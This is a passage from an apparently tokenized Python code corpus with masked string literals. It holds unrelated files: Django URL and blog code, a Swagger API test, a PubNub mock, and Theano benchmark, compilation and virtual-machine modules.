'<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> urlpatterns += patterns ( <EOL> '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> urlpatterns += patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , feeds . 
AllFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . MineFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . ReviewsFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . ClosedFeed ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , feeds . OneIssueFeed ( ) , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import httplib <EOL> import json <EOL> import unittest <EOL> from swagger import Swagger <EOL> class SwaggerTestCast ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . client = Swagger . load ( '<STR_LIT>' ) <EOL> self . data = { <EOL> '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT:name>' : '<STR_LIT:string>' , <EOL> } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT:string>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT:name>' : '<STR_LIT:string>' , <EOL> } <EOL> ] , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> } <EOL> @ property <EOL> def pet ( self ) : <EOL> data = json . dumps ( self . data ) <EOL> res = self . client . post ( '<STR_LIT>' , body = data , auth = '<STR_LIT>' ) <EOL> return res . json ( ) <EOL> def test_swagger_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . client . Version , '<STR_LIT>' ) <EOL> def test_set_headers ( self ) : <EOL> pass <EOL> def test_swagger_default_scheme ( self ) : <EOL> self . assertEqual ( self . client . DefaultScheme , '<STR_LIT:http>' ) <EOL> def test_create_pet_endpoint ( self ) : <EOL> data = json . dumps ( self . data ) <EOL> expected_url = '<STR_LIT>' <EOL> res = self . client . post ( '<STR_LIT>' , body = data , auth = '<STR_LIT>' ) <EOL> self . assertEqual ( res . url , expected_url ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , dict ) ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> def test_get_pet_by_id_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . get ( '<STR_LIT>' , petId = petId ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> def test_find_pets_by_status_endpoint ( self ) : <EOL> statuses = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> for status in statuses : <EOL> res = self . client . 
get ( '<STR_LIT>' , status = status ) <EOL> expected_url = ( <EOL> '<STR_LIT>' <EOL> ) . format ( status ) <EOL> self . assertEqual ( res . url , expected_url ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , list ) ) <EOL> def test_find_pets_by_tags_endpoint ( self ) : <EOL> tags = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> tags = '<STR_LIT:U+002CU+0020>' . join ( [ tag for tag in tags ] ) <EOL> res = self . client . get ( '<STR_LIT>' , tags = tags ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , list ) ) <EOL> def test_find_pet_by_id_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . get ( '<STR_LIT>' , petId = petId ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> self . assertTrue ( isinstance ( res . json ( ) , dict ) ) <EOL> def test_pet_update_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . post ( '<STR_LIT>' , petId = petId , name = '<STR_LIT:foo>' , <EOL> status = '<STR_LIT:bar>' , <EOL> format = '<STR_LIT>' ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) <EOL> def test_delete_pet_endpoint ( self ) : <EOL> petId = self . pet [ '<STR_LIT:id>' ] <EOL> res = self . client . delete ( '<STR_LIT>' , petId = petId , <EOL> auth = '<STR_LIT>' ) <EOL> self . assertEqual ( res . status_code , httplib . OK ) </s>
<s> from django . template . defaultfilters import striptags <EOL> from django . template . defaultfilters import truncatewords <EOL> from django . views import generic <EOL> import social_metadata . views <EOL> from blog import models <EOL> class HomeView ( generic . ListView ) : <EOL> def get_queryset ( self ) : <EOL> return models . Post . objects . all ( ) . order_by ( '<STR_LIT>' ) <EOL> home_view = HomeView . as_view ( ) <EOL> class PostView ( social_metadata . views . SocialDataMixin , generic . DetailView ) : <EOL> model = models . Post <EOL> def get_social_title ( self ) : <EOL> return self . object . title <EOL> def get_social_images ( self ) : <EOL> yield self . object . cover_image . url <EOL> def get_social_description ( self ) : <EOL> return truncatewords ( striptags ( self . object . text ) , <NUM_LIT:50> ) <EOL> post_view = PostView . as_view ( ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . utils . timezone import utc <EOL> import datetime <EOL> class Migration ( migrations . Migration ) : <EOL> replaces = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> dependencies = [ <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:title>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT:text>' , models . TextField ( default = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( auto_now_add = True , default = datetime . datetime ( <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , tzinfo = utc ) ) ) , <EOL> ] , <EOL> ) , <EOL> ] </s>
<s> from . . core import Observable <EOL> class PubnubMock ( Observable ) : <EOL> def __init__ ( self ) : <EOL> Observable . __init__ ( self ) <EOL> def subscribe ( self , channel , callback = None , error = None , connect = None , reconnect = None , disconnect = None ) : <EOL> self . on ( '<STR_LIT:message>' , callback ) <EOL> def unsubscribe ( self , channel ) : <EOL> pass <EOL> def receive_message ( self , message ) : <EOL> self . emit ( '<STR_LIT:message>' , message ) </s>
<s> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> import numpy <EOL> import sys <EOL> import time <EOL> import theano <EOL> import theano . tensor as T <EOL> import theano . sandbox <EOL> from six . moves import xrange <EOL> from theano . compile import module , Mode , ProfileMode <EOL> from theano import gof , Op , Apply <EOL> from theano . tensor import blas , opt <EOL> if <NUM_LIT:0> : <EOL> class Opt ( object ) : <EOL> merge = theano . gof . MergeOptimizer ( ) <EOL> gemm_opt_1 = theano . gof . TopoOptimizer ( theano . tensor_opt . gemm_pattern_1 ) <EOL> gemm_opt_2 = theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( <EOL> T . sub_inplace , <EOL> '<STR_LIT:d>' , <EOL> ( <EOL> T . mul , <EOL> dict ( pattern = ( T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , inplace = True ) , '<STR_LIT:a>' ) , <EOL> allow_multiple_clients = True ) , <EOL> ( <EOL> T . add , <EOL> ( T . dot , '<STR_LIT:b>' , '<STR_LIT:c>' ) , <EOL> ( T . transpose_inplace , ( T . dot , '<STR_LIT:f>' , '<STR_LIT:g>' ) ) <EOL> ) <EOL> ) <EOL> ) , <EOL> ( <EOL> T . gemm , <EOL> ( <EOL> T . gemm , <EOL> '<STR_LIT:d>' , <EOL> ( T . neg , '<STR_LIT:a>' ) , <EOL> ( T . transpose_inplace , '<STR_LIT:g>' ) , <EOL> ( T . transpose_inplace , '<STR_LIT:f>' ) , <EOL> T . constant ( <NUM_LIT:1.0> ) <EOL> ) , <EOL> ( T . neg , '<STR_LIT:a>' ) , <EOL> '<STR_LIT:b>' , <EOL> '<STR_LIT:c>' , <EOL> T . constant ( <NUM_LIT:1.0> ) <EOL> ) , <EOL> allow_multiple_clients = False ) ) <EOL> sqr = [ ] <EOL> sqr . append ( theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . mul , '<STR_LIT:x>' , '<STR_LIT:x>' ) , <EOL> ( T . sqr , '<STR_LIT:x>' ) , allow_multiple_clients = True ) ) ) <EOL> sqr . append ( theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . pow , '<STR_LIT:x>' , ( T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , inplace = True ) , T . constant ( <NUM_LIT:2> ) ) ) , <EOL> ( T . 
sqr , '<STR_LIT:x>' ) , allow_multiple_clients = True ) ) ) <EOL> ident_opt_list = [ ] <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . tensor_copy , '<STR_LIT:x>' ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . transpose_inplace , ( T . transpose_inplace , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . sqr , ( T . sqrt , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . sqrt , ( T . sqr , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . mul , '<STR_LIT:x>' , ( T . div , '<STR_LIT:y>' , '<STR_LIT:x>' ) ) , <EOL> '<STR_LIT:y>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . mul , ( T . div , '<STR_LIT:y>' , '<STR_LIT:x>' ) , '<STR_LIT:x>' ) , <EOL> '<STR_LIT:y>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . div , ( T . mul , '<STR_LIT:y>' , '<STR_LIT:x>' ) , '<STR_LIT:x>' ) , <EOL> '<STR_LIT:y>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> ident_opt_list . append ( <EOL> theano . gof . TopoOptimizer ( <EOL> theano . gof . PatternSub ( <EOL> ( T . div , ( T . 
mul , '<STR_LIT:y>' , '<STR_LIT:x>' ) , '<STR_LIT:y>' ) , <EOL> '<STR_LIT:x>' , <EOL> allow_multiple_clients = True ) ) ) <EOL> def __call__ ( self , env ) : <EOL> self . merge ( env ) <EOL> if <NUM_LIT:0> : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> for opt in self . ident_opt_list : <EOL> opt ( env ) <EOL> for opt in self . sqr : <EOL> opt ( env ) <EOL> self . gemm_opt_1 ( env ) <EOL> self . gemm_opt_2 ( env ) <EOL> self . merge ( env ) <EOL> def print_graph_linker ( print_prog = True ) : <EOL> if <NUM_LIT:1> : <EOL> imap = { None : '<STR_LIT:->' } <EOL> def blah ( i , node , thunk ) : <EOL> imap [ node ] = str ( i ) <EOL> if print_prog : <EOL> if False and node . op == T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , inplace = True ) : <EOL> print ( node . op == T . DimShuffle ( ( ) , [ '<STR_LIT:x>' , '<STR_LIT:x>' ] , <EOL> inplace = True ) , end = '<STR_LIT:U+0020>' ) <EOL> print ( node . inputs [ <NUM_LIT:0> ] , type ( node . inputs [ <NUM_LIT:0> ] ) , end = '<STR_LIT:U+0020>' ) <EOL> print ( node . inputs [ <NUM_LIT:0> ] . equals ( T . constant ( <NUM_LIT:2> ) ) , end = '<STR_LIT:U+0020>' ) <EOL> outputs = node . outputs <EOL> inputs = theano . gof . graph . inputs ( outputs ) <EOL> print ( '<STR_LIT>' , i , node , end = '<STR_LIT:U+0020>' ) <EOL> print ( '<STR_LIT::>' . join ( [ imap [ inp . owner ] for inp in node . inputs ] ) ) <EOL> return theano . sandbox . wraplinker . WrapLinkerMany ( <EOL> [ theano . gof . OpWiseCLinker ( ) ] , <EOL> [ theano . sandbox . wraplinker . run_all <EOL> , blah <EOL> ] ) <EOL> else : <EOL> return theano . gof . OpWiseCLinker ( ) <EOL> class M ( module . Module ) : <EOL> def __init__ ( self ) : <EOL> super ( M , self ) . __init__ ( ) <EOL> x = T . matrix ( '<STR_LIT:x>' ) <EOL> self . w = module . Member ( T . matrix ( '<STR_LIT:w>' ) ) <EOL> self . a = module . Member ( T . vector ( '<STR_LIT:a>' ) ) <EOL> self . b = module . Member ( T . vector ( '<STR_LIT:b>' ) ) <EOL> self . hid = T . tanh ( T . 
dot ( x , self . w ) + self . a ) <EOL> hid = self . hid <EOL> self . out = T . tanh ( T . dot ( hid , self . w . T ) + self . b ) <EOL> out = self . out <EOL> self . err = <NUM_LIT:0.5> * T . sum ( ( out - x ) ** <NUM_LIT:2> ) <EOL> err = self . err <EOL> params = [ self . w , self . a , self . b ] <EOL> gparams = T . grad ( err , params ) <EOL> updates = [ ( p , p - <NUM_LIT> * gp ) for p , gp in zip ( params , gparams ) ] <EOL> self . step = module . Method ( [ x ] , err , updates = dict ( updates ) ) <EOL> mod = M ( ) <EOL> mode = '<STR_LIT>' <EOL> mode = Mode ( optimizer = '<STR_LIT>' , linker = theano . gof . OpWiseCLinker ( nice_errors = True ) ) <EOL> mode = Mode ( optimizer = '<STR_LIT>' , linker = '<STR_LIT:c>' ) <EOL> mode = Mode ( optimizer = '<STR_LIT>' , linker = '<STR_LIT>' ) <EOL> print ( mod . pretty ( mode = mode ) ) <EOL> m = mod . make ( mode = mode ) <EOL> neg , nout , nhid , niter = [ int ( a ) for a in sys . argv [ <NUM_LIT:1> : ] ] <EOL> rng = numpy . random . RandomState ( <NUM_LIT> ) <EOL> m . w = rng . rand ( nout , nhid ) <EOL> m . a = rng . randn ( nhid ) * <NUM_LIT:0.0> <EOL> m . b = rng . randn ( nout ) * <NUM_LIT:0.0> <EOL> x = ( rng . rand ( neg , nout ) - <NUM_LIT:0.5> ) * <NUM_LIT> <EOL> t = time . time ( ) <EOL> for i in xrange ( niter ) : <EOL> err = m . step ( x ) <EOL> print ( '<STR_LIT>' , time . time ( ) - t , '<STR_LIT>' , err ) <EOL> try : <EOL> mode . print_summary ( ) <EOL> pass <EOL> except : <EOL> pass </s>
<s> import numpy <EOL> import theano <EOL> x , y , z = theano . tensor . vectors ( '<STR_LIT>' ) <EOL> f = theano . function ( [ x , y , z ] , [ ( x + y + z ) * <NUM_LIT:2> ] ) <EOL> xv = numpy . random . rand ( <NUM_LIT:10> ) . astype ( theano . config . floatX ) <EOL> yv = numpy . random . rand ( <NUM_LIT:10> ) . astype ( theano . config . floatX ) <EOL> zv = numpy . random . rand ( <NUM_LIT:10> ) . astype ( theano . config . floatX ) <EOL> f ( xv , yv , zv ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import unittest <EOL> import theano <EOL> import theano . tensor as T <EOL> from theano . compile import Mode , ProfileMode <EOL> class T_bunch_of_modes ( unittest . TestCase ) : <EOL> def test1 ( self ) : <EOL> linker_classes_involved = [ ] <EOL> predef_modes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> predef_modes . append ( ProfileMode ( ) ) <EOL> if theano . config . cxx : <EOL> linkers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> linkers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> modes = predef_modes + [ Mode ( linker , '<STR_LIT>' ) for linker in linkers ] <EOL> for mode in modes : <EOL> x = T . matrix ( ) <EOL> y = T . vector ( ) <EOL> f = theano . function ( [ x , y ] , x + y , mode = mode ) <EOL> f ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ] , [ <NUM_LIT:5> , <NUM_LIT:6> ] ) <EOL> linker_classes_involved . append ( f . maker . mode . linker . __class__ ) <EOL> assert <NUM_LIT:5> == len ( set ( linker_classes_involved ) ) <EOL> class T_ProfileMode_WrapLinker ( unittest . TestCase ) : <EOL> def test_1 ( self ) : <EOL> x = T . matrix ( ) <EOL> mode = ProfileMode ( ) <EOL> theano . function ( [ x ] , x * <NUM_LIT:2> , mode = mode ) <EOL> default_mode = theano . compile . mode . get_default_mode ( ) <EOL> modified_mode = default_mode . including ( '<STR_LIT>' ) <EOL> copy . deepcopy ( modified_mode ) <EOL> linker = theano . compile . mode . get_default_mode ( ) . linker <EOL> assert not hasattr ( linker , "<STR_LIT>" ) or linker . fgraph is None <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import errno <EOL> import logging <EOL> import os <EOL> from six . moves import reload_module as reload <EOL> import sys <EOL> import warnings <EOL> import theano <EOL> from theano import config <EOL> from theano . gof . compilelock import get_lock , release_lock <EOL> from theano . gof import cmodule <EOL> _logger = logging . getLogger ( '<STR_LIT>' ) <EOL> force_compile = False <EOL> version = <NUM_LIT> <EOL> lazylinker_ext = None <EOL> def try_import ( ) : <EOL> global lazylinker_ext <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ config . compiledir ] <EOL> import lazylinker_ext <EOL> del sys . path [ <NUM_LIT:0> ] <EOL> def try_reload ( ) : <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ config . compiledir ] <EOL> reload ( lazylinker_ext ) <EOL> del sys . path [ <NUM_LIT:0> ] <EOL> try : <EOL> location = os . path . join ( config . compiledir , '<STR_LIT>' ) <EOL> if not os . path . exists ( location ) : <EOL> try : <EOL> os . mkdir ( location ) <EOL> except OSError as e : <EOL> assert e . errno == errno . EEXIST <EOL> assert os . path . isdir ( location ) <EOL> init_file = os . path . join ( location , '<STR_LIT>' ) <EOL> if not os . path . exists ( init_file ) : <EOL> try : <EOL> open ( init_file , '<STR_LIT:w>' ) . close ( ) <EOL> except IOError as e : <EOL> if os . path . exists ( init_file ) : <EOL> pass <EOL> else : <EOL> e . args += ( '<STR_LIT>' % ( location , <EOL> os . path . 
exists ( location ) ) , ) <EOL> raise <EOL> _need_reload = False <EOL> if force_compile : <EOL> raise ImportError ( ) <EOL> else : <EOL> try_import ( ) <EOL> _need_reload = True <EOL> if version != getattr ( lazylinker_ext , '<STR_LIT>' , None ) : <EOL> raise ImportError ( ) <EOL> except ImportError : <EOL> get_lock ( ) <EOL> try : <EOL> try : <EOL> if force_compile : <EOL> raise ImportError ( ) <EOL> if _need_reload : <EOL> try_reload ( ) <EOL> else : <EOL> try_import ( ) <EOL> _need_reload = True <EOL> if version != getattr ( lazylinker_ext , '<STR_LIT>' , None ) : <EOL> raise ImportError ( ) <EOL> except ImportError : <EOL> if not theano . config . cxx : <EOL> raise <EOL> _logger . info ( "<STR_LIT>" ) <EOL> dirname = '<STR_LIT>' <EOL> cfile = os . path . join ( theano . __path__ [ <NUM_LIT:0> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( cfile ) : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> code = open ( cfile ) . read ( ) <EOL> loc = os . path . join ( config . compiledir , dirname ) <EOL> if not os . path . exists ( loc ) : <EOL> try : <EOL> os . mkdir ( loc ) <EOL> except OSError as e : <EOL> assert e . errno == errno . EEXIST <EOL> assert os . path . exists ( loc ) <EOL> args = cmodule . GCC_compiler . compile_args ( ) <EOL> cmodule . GCC_compiler . compile_str ( dirname , code , location = loc , <EOL> preargs = args ) <EOL> init_py = os . path . join ( loc , '<STR_LIT>' ) <EOL> open ( init_py , '<STR_LIT:w>' ) . write ( '<STR_LIT>' % version ) <EOL> init_pyc = os . path . join ( loc , '<STR_LIT>' ) <EOL> if os . path . isfile ( init_pyc ) : <EOL> os . remove ( init_pyc ) <EOL> try_import ( ) <EOL> try_reload ( ) <EOL> from lazylinker_ext import lazylinker_ext as lazy_c <EOL> assert ( lazylinker_ext . _version == <EOL> lazy_c . get_version ( ) ) <EOL> _logger . 
info ( "<STR_LIT>" , lazylinker_ext . _version ) <EOL> finally : <EOL> release_lock ( ) <EOL> from lazylinker_ext . lazylinker_ext import * <EOL> assert force_compile or ( version == get_version ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from . import link <EOL> from collections import defaultdict <EOL> import logging <EOL> import os <EOL> import sys <EOL> import time <EOL> import warnings <EOL> from theano . configparser import ( config , _config_var_list ) <EOL> import theano . gof . cmodule <EOL> from six import iteritems , itervalues <EOL> from six . moves import xrange <EOL> logger = logging . getLogger ( __name__ ) <EOL> def calculate_reallocate_info ( order , fgraph , storage_map , compute_map_re , <EOL> dependencies ) : <EOL> reallocated_info = { } <EOL> viewed_by = { } <EOL> for var in fgraph . variables : <EOL> viewed_by [ var ] = [ ] <EOL> view_of = { } <EOL> pre_allocated = set ( [ ] ) <EOL> allocated = set ( [ ] ) <EOL> for idx in range ( len ( order ) ) : <EOL> node = order [ idx ] <EOL> dmap = getattr ( node . op , '<STR_LIT>' , None ) <EOL> vmap = getattr ( node . op , '<STR_LIT>' , None ) <EOL> idx_o = <NUM_LIT:0> <EOL> for out in node . outputs : <EOL> for var in node . outputs : <EOL> compute_map_re [ var ] [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> ins = None <EOL> if dmap and idx_o in dmap : <EOL> idx_v = dmap [ idx_o ] <EOL> assert len ( idx_v ) == <NUM_LIT:1> , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ins = node . inputs [ idx_v [ <NUM_LIT:0> ] ] <EOL> if vmap and idx_o in vmap : <EOL> assert ins is None <EOL> idx_v = vmap [ idx_o ] <EOL> assert len ( idx_v ) == <NUM_LIT:1> , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ins = node . inputs [ idx_v [ <NUM_LIT:0> ] ] <EOL> if ins is not None : <EOL> assert isinstance ( ins , theano . Variable ) <EOL> origin = view_of . get ( ins , ins ) <EOL> view_of [ out ] = origin <EOL> viewed_by [ origin ] . append ( out ) <EOL> idx_o += <NUM_LIT:1> <EOL> for ins in node . inputs : <EOL> assert not ( ins in view_of and viewed_by [ ins ] ) <EOL> if ( getattr ( ins , '<STR_LIT>' , None ) == <NUM_LIT:0> and not storage_map [ ins ] [ <NUM_LIT:0> ] and <EOL> ins not in fgraph . outputs and ins . 
owner and <EOL> all ( [ compute_map_re [ v ] [ <NUM_LIT:0> ] <EOL> for v in dependencies . get ( ins , [ ] ) ] ) and <EOL> ins not in allocated ) : <EOL> reuse_out = None <EOL> if ins not in view_of and not viewed_by . get ( ins , [ ] ) : <EOL> for i in range ( idx + <NUM_LIT:1> , len ( order ) ) : <EOL> if reuse_out is not None : <EOL> break <EOL> for out in order [ i ] . outputs : <EOL> if ( getattr ( out , '<STR_LIT>' , None ) == <NUM_LIT:0> and <EOL> out not in pre_allocated and <EOL> ins . type == out . type ) : <EOL> reuse_out = out <EOL> pre_allocated . add ( out ) <EOL> allocated . add ( ins ) <EOL> break <EOL> elif ins in view_of : <EOL> origin = view_of [ ins ] <EOL> if ins in viewed_by [ origin ] : <EOL> viewed_by [ origin ] . remove ( ins ) <EOL> if ( not viewed_by [ origin ] and <EOL> origin not in fgraph . inputs and <EOL> not isinstance ( origin , theano . Constant ) ) : <EOL> for i in range ( idx + <NUM_LIT:1> , len ( order ) ) : <EOL> if reuse_out is not None : <EOL> break <EOL> for out in order [ i ] . outputs : <EOL> if ( getattr ( out , '<STR_LIT>' , None ) == <NUM_LIT:0> and <EOL> out not in pre_allocated and <EOL> ins . type == out . type ) : <EOL> reuse_out = out <EOL> pre_allocated . add ( out ) <EOL> allocated . add ( ins ) <EOL> break <EOL> if reuse_out is not None : <EOL> reallocated_info [ ins ] = [ ins , reuse_out ] <EOL> return reallocated_info <EOL> class VM ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nodes , thunks , pre_call_clear ) : <EOL> if len ( nodes ) != len ( thunks ) : <EOL> raise ValueError ( ) <EOL> self . nodes = nodes <EOL> self . thunks = thunks <EOL> self . pre_call_clear = pre_call_clear <EOL> self . call_counts = [ <NUM_LIT:0> ] * len ( nodes ) <EOL> self . call_times = [ <NUM_LIT:0> ] * len ( nodes ) <EOL> self . time_thunks = False <EOL> self . 
need_update_inputs = True <EOL> def __call__ ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def clear_storage ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def update_profile ( self , profile ) : <EOL> for node , thunk , t , c in zip ( self . nodes , self . thunks , <EOL> self . call_times , self . call_counts ) : <EOL> profile . apply_time . setdefault ( node , <NUM_LIT:0.0> ) <EOL> profile . apply_time [ node ] += t <EOL> profile . apply_callcount . setdefault ( node , <NUM_LIT:0> ) <EOL> profile . apply_callcount [ node ] += c <EOL> profile . apply_cimpl [ node ] = hasattr ( thunk , '<STR_LIT>' ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . variable_shape = self . variable_shape . copy ( ) <EOL> profile . variable_strides = self . variable_strides . copy ( ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . node_executed_order = self . node_executed_order [ : ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . node_cleared_order = self . node_cleared_order [ : ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> profile . dependencies = self . dependencies <EOL> for i in xrange ( len ( self . call_times ) ) : <EOL> self . call_times [ i ] = <NUM_LIT:0.0> <EOL> self . call_counts [ i ] = <NUM_LIT:0> <EOL> class Loop ( VM ) : <EOL> """<STR_LIT>""" <EOL> allow_gc = False <EOL> def __call__ ( self ) : <EOL> if self . time_thunks : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> for i , ( thunk , node ) in enumerate ( zip ( self . thunks , <EOL> self . nodes ) ) : <EOL> t0 = time . time ( ) <EOL> thunk ( ) <EOL> t1 = time . time ( ) <EOL> self . call_counts [ i ] += <NUM_LIT:1> <EOL> self . call_times [ i ] += t1 - t0 <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> else : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> for thunk , node in zip ( self . 
thunks , self . nodes ) : <EOL> thunk ( ) <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> class LoopGC ( VM ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nodes , thunks , pre_call_clear , post_thunk_clear ) : <EOL> super ( LoopGC , self ) . __init__ ( nodes , thunks , pre_call_clear ) <EOL> self . post_thunk_clear = post_thunk_clear <EOL> self . allow_gc = True <EOL> if not ( len ( nodes ) == len ( thunks ) == len ( post_thunk_clear ) ) : <EOL> raise ValueError ( ) <EOL> def __call__ ( self ) : <EOL> if self . time_thunks : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> i = <NUM_LIT:0> <EOL> for thunk , node , old_storage in zip ( self . thunks , <EOL> self . nodes , <EOL> self . post_thunk_clear ) : <EOL> t0 = time . time ( ) <EOL> thunk ( ) <EOL> t1 = time . time ( ) <EOL> self . call_counts [ i ] += <NUM_LIT:1> <EOL> self . call_times [ i ] += t1 - t0 <EOL> for old_s in old_storage : <EOL> old_s [ <NUM_LIT:0> ] = None <EOL> i += <NUM_LIT:1> <EOL> except : <EOL> link . raise_with_op ( node , thunk ) <EOL> else : <EOL> for cont in self . pre_call_clear : <EOL> cont [ <NUM_LIT:0> ] = None <EOL> try : <EOL> for 